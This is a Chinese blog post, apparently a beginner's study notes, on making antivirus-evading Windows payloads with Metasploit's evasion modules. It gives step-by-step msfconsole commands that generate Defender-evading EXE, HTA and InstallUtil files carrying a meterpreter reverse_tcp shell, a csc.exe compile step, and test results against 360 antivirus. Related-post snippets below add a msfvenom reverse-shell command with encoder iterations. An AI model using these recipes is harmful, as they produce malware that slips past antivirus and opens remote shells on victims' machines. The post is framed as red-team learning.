免杀马学习(MSF Evasion)

最新推荐文章于 2025-03-11 10:04:25 发布
最新推荐文章于 2025-03-11 10:04:25 发布
阅读量567 收藏 3
点赞数
分类专栏: 免杀学习与对抗 文章标签: 学习 microsoft windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47533648/article/details/128887406
版权

2023年将会持续于B站、优快云等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

前言

仅供学习,入行前的笔记,关于免杀效果请勿喷

用法

原理:混淆加密绕过
Evasion模块:
   0  windows/applocker_evasion_install_util                        normal  No     Applocker Evasion - .NET Framework Installation Utility
   1  windows/applocker_evasion_msbuild                             normal  No     Applocker Evasion - MSBuild
   2  windows/applocker_evasion_presentationhost                    normal  No     Applocker Evasion - Windows Presentation Foundation Host
   3  windows/applocker_evasion_regasm_regsvcs                      normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   4  windows/applocker_evasion_workflow_compiler                   normal  No     Applocker Evasion - Microsoft Workflow Compiler
   5  windows/windows_defender_exe                                  normal  No     Microsoft Windows Defender Evasive Executable
   6  windows/windows_defender_js_hta                               normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

生成exe
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
msf5 evasion(windows/windows_defender_exe) > run
生成HTA
> use windows/windows_defender_js_hta  
> set payload windows/meterpreter/reverse_tcp
> set lhost 10.211.55.2
> set lport 3333
> run
生成install_util
> use windows/applocker_evasion_install_util
> set payload windows/meterpreter/reverse_tcp
> set lhost 10.211.55.2
> set lport 3333
> run

最高管理员权限:
csc.exe /out:shell.exe C:\Users\Administrator\Desktop\install_util.txt
在这里插入图片描述
免杀分析:
静态查杀过360
在这里插入图片描述
动态被查杀:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

总结

制作免杀马手段最好还是用多种免杀手法去进行,单一的免杀制作现在已经过不去大部分杀软了。
利用msfvenom制作windows
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木 制作常规的木msfvenom -a x86 --platform window...
php
07-16
php php 大
简单的Msf
weixin_47948655的博客
08-12 1481
简单加密shellcode与加载器实现msf
【kali笔记】MSF内网渗透,手把手教你如何过360!网络安全零基础入门到精通教程!
最新发布
Cairo_A的博客
03-11 765
技术通过修改病毒、木的内容或者特征码,使其能够躲避毒软件的查毒软件通常通过识别病毒或木的特征码来检测和清楚恶意软件。技术通过修改这些特征码,使病毒或木毒软件的检测下“隐身”。我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接费领取~与反的较量永无止境。本文所述方法目前有效,但技术日新月异,需不断实践与创新,方能在实战中立于不败之地。👉1.成长路线图&学习规划👈。
msf
weixin_30662849的博客
04-13 329
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能 突然看到一个帖子 很牛逼 依然到现在还是的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
MSF
LainWith的博客
12-12 3092
MSF 参考: 远控专题文章(2)-msfvenom隐藏的参数 远控专题文章(3)-msf(VT率35/69) msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-framework下面的的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)都不再被支持。 参数 ![image.png](https://img
msf编码
m0_61506558的博客
09-03 2884
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
方法(三)msf加载器
qq_56426046的博客
10-03 1136
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
学习(MSF二进制混淆加密)
红队是青春
02-01 631
2022年笔记,刚入行前学习
msf生成
qq_56426046的博客
09-08 6066
1.修改特征码的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木所固有的特征,并保证其原有功能没有改变,一次就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到的效果事实上包含着两种方式。一种是改特征码,这也是的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
MSFconsole进阶】evasion模块):模块使用方法,相关设置
05-24 1859
【渗透工具】MSFconsole进阶:evasion模块)
MSF evasion模块的使用
永远是少年
06-10 635
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF evasion模块的使用。 一、木文件生成 二、SHELL反弹检验
msf生成
qq_66985187的博客
07-04 2624
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木的内容改变特征码,从而躲避了毒软件的查。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现的操作。由于技术的涉猎面非常广,其中包含反。简称"",它指的是一种能使病毒木于被。补充:常见的后门生成方式!在kali中生成常见的木命令。
MSF-Evasion模块
LainWith的博客
12-15 1294
最近开始学习,发现Tide团队有的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址 远控专题文章(4)-Evasion模块(VT率12/71) 实验环境前言defender(VT查率42/69)hta(VT查率26/61)其他 实验环境 为避导致别的平台没有机会检测,实验时会每次只启动一个软,然后截图,最后把关于这个木的截图汇成一张图 选择的是当下最新版本的火绒、360、360毒、腾讯电脑管家,版本如下: 火
初学MSF之渗透、提权、(上)
qq_53058639的博客
08-01 2389
Metasploit是一个费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
msf
Xor0ne
03-12 1738
1、专业术语 渗透攻击(Exploit) 攻击载荷(Payload) Shellcode 模块(Module) 监听器(Listener) 2、msfvenom生成攻击载荷 msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项。再按照某些教程输后两个命令是不行的。 参考链接:https://www.jianshu.com/p/204874fea1d3 Op...
学习(MSF Shellter)
红队是青春
02-05 363
学习 MSF Shellter
msf反弹木
satasun的博客
04-10 2375
原理 利用msf模块中的msfvenom模块,首先生成.exe木文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 准备 win7靶机 ip :192.168.56.130 kali攻击机 ip: 192.168.56.135 ##实战开始 1.打开kali机,在命令行输入: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值